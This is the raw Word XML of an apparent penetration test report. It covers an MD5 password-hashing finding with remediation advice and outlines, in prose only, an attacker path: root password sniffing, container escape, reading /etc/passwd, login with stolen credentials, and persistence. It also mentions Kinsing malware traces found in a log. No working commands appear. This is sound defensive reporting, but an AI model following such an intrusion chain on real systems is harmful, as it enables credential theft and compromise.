              </w:rPr>
              <w:t>Ubuntu 22.04.1 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="7E8F9502">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="40358724" w:rsidP="57C4D39E" w:rsidRDefault="40358724" w14:paraId="22B62348" w14:textId="78DE9F6B">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="40358724" w:rsidP="57C4D39E" w:rsidRDefault="40358724" w14:paraId="5076BA79" w14:textId="1902B9D0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>it_consultant</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724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40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>vese_projects</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>-code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724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40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>webistes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724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40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40358724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40358724">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="037F4AE6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> and /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="037F4AE6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="037F4AE6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037F4AE6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>vese</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="037F4AE6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>-project-dockers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="037F4AE6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037F4AE6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="037F4AE6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="037F4AE6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>setup.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="201FAAD9">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr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26F449AC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References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76841CBF" w:rsidP="57C4D39E" w:rsidRDefault="76841CBF" w14:noSpellErr="1" w14:paraId="21A95B09" w14:textId="6DCD6593">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc194a540caa54f20">
              <w:r w:rsidRPr="57C4D39E" w:rsidR="76841CBF">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:rFonts w:cs="Times New Roman"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/328.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="402B24AB" w:rsidP="57C4D39E" w:rsidRDefault="402B24AB" w14:paraId="73EF3E1E" w14:textId="2235AD8B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="memsecretver" r:id="R4aa8b105f1e544de">
              <w:r w:rsidRPr="57C4D39E" w:rsidR="402B24AB">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:rFonts w:cs="Times New Roman"/>
                </w:rPr>
                <w:t>https://pages.nist.gov/800-63-3/sp800-63b.html#memsecretver</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="402B24AB" w:rsidP="57C4D39E" w:rsidRDefault="402B24AB" w14:paraId="4DB2EAA3" w14:textId="58D0AD7E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R965c028869c24b7b">
              <w:r w:rsidRPr="57C4D39E" w:rsidR="402B24AB">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:rFonts w:cs="Times New Roman"/>
                </w:rPr>
                <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="2424EA19" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="3101640A" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="25191DC4" w14:textId="7EEE4487">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="66BB44C9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MariaDB database is using </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="08A82FEE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwords hashed with MD5. </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="31686639">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>This hashing algorithm is considered not secure as adversary can determine the original input from the output value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0E93C408" w14:textId="111622CB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2765086F">
        <w:drawing>
          <wp:inline wp14:editId="38A3C217" wp14:anchorId="5972AFA8">
            <wp:extent cx="4572000" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="365281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6e163b458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0" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="350F7A55" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D919F7E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-793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4A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="1589DB93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7325ABA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Who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3C37967A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 xml:space="preserve">IT </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="33525C01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549F7258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5F8A23FC" w14:textId="3E3E3BA1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</w:rPr>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="38B2C6DC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="6E1DBEB6">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E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  <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="6394C335" w14:textId="0B984741">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="65C43C30">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="65C43C30">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Use a strong hash algorithm that is considered as standard </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="40D27220">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>[for example NIST recommends PBKDF2</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="791DFA28">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> or for example Argon2id</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="791DFA28">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> as with the highest resistance against GPU cracking attacks]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="0561E627" w14:textId="2352054B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0694A222" w14:textId="7BFBE663">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="00C73D00" w:rsidRDefault="00BD0B0F" w14:paraId="66DEF365" w14:textId="254A9F03">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:name="_Toc119432378" w:id="6"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00C73D00">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Exploitation Paths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="3A0EA6CE" w14:textId="7814411F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="220DA879" w:rsidP="57C4D39E" w:rsidRDefault="220DA879" w14:paraId="03778E4E" w14:textId="10B67EE0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="220DA879">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Possible </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="661B411E">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0714F8EF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ttacker</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0714F8EF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E111580" w:rsidP="57C4D39E" w:rsidRDefault="6E111580" w14:paraId="4848D76D" w14:textId="68F054EC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E111580">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Catching the </w:t>
      </w:r>
      <w:r w:rsidR="614BFA0E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="6E111580">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password through </w:t>
      </w:r>
      <w:r w:rsidR="06F80AFE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="6E111580">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>network sniffing</w:t>
      </w:r>
      <w:r w:rsidR="7503ED74">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="7503ED74">
        <w:drawing>
          <wp:inline wp14:editId="040B74BF" wp14:anchorId="4F856E89">
            <wp:extent cx="4705350" cy="1921351"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94775695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1a0923ef4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03957" w:rsidP="57C4D39E" w:rsidRDefault="20D03957" w14:paraId="7CE14463" w14:textId="033CD772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20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Getting RCE from Vese Pseudo-Terminal</w:t>
      </w:r>
      <w:r w:rsidR="1D8E95CC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20D03957" w:rsidP="57C4D39E" w:rsidRDefault="20D03957" w14:paraId="0C084B6F" w14:textId="0A4F7AA8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20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Escaping the Docker container</w:t>
      </w:r>
      <w:r w:rsidR="1D8E95CC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20D03957" w:rsidP="57C4D39E" w:rsidRDefault="20D03957" w14:paraId="19D3B88B" w14:textId="773698AD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20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd </w:t>
      </w:r>
      <w:r w:rsidR="20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>file for users</w:t>
      </w:r>
      <w:r w:rsidR="5E171E90">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20D03957" w:rsidP="57C4D39E" w:rsidRDefault="20D03957" w14:paraId="0B9D5995" w14:textId="583A2F51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="20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logging in as </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">johnsysadmin </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>with stolen password</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="69F4F041">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20D03957" w:rsidP="57C4D39E" w:rsidRDefault="20D03957" w14:paraId="1D6B3CE7" w14:textId="0A284070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57C4D39E" w:rsidR="20D03957">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Setting up persistence methods.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="19581132" w14:textId="453BA1D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6BA7D4D5" w:rsidP="57C4D39E" w:rsidRDefault="6BA7D4D5" w14:paraId="1B750DBB" w14:textId="10500CD2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="6BA7D4D5">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Kinsing</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="6BA7D4D5">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5ED720A7" w:rsidP="57C4D39E" w:rsidRDefault="5ED720A7" w14:paraId="3E8AE1A1" w14:textId="71F6848B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="5ED720A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="5ED720A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5ED720A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>investigated</w:t>
      </w:r>
      <w:r w:rsidR="5ED720A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5ED720A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="5ED720A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file: </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>vese</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>-project-dockers</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/data/logs/default-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>host_access</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2469C61D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>.log</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="45778CFD">
        <w:drawing>
          <wp:inline wp14:editId="4315AF5D" wp14:anchorId="4F36D6CD">
            <wp:extent cx="5790314" cy="2533262"/>
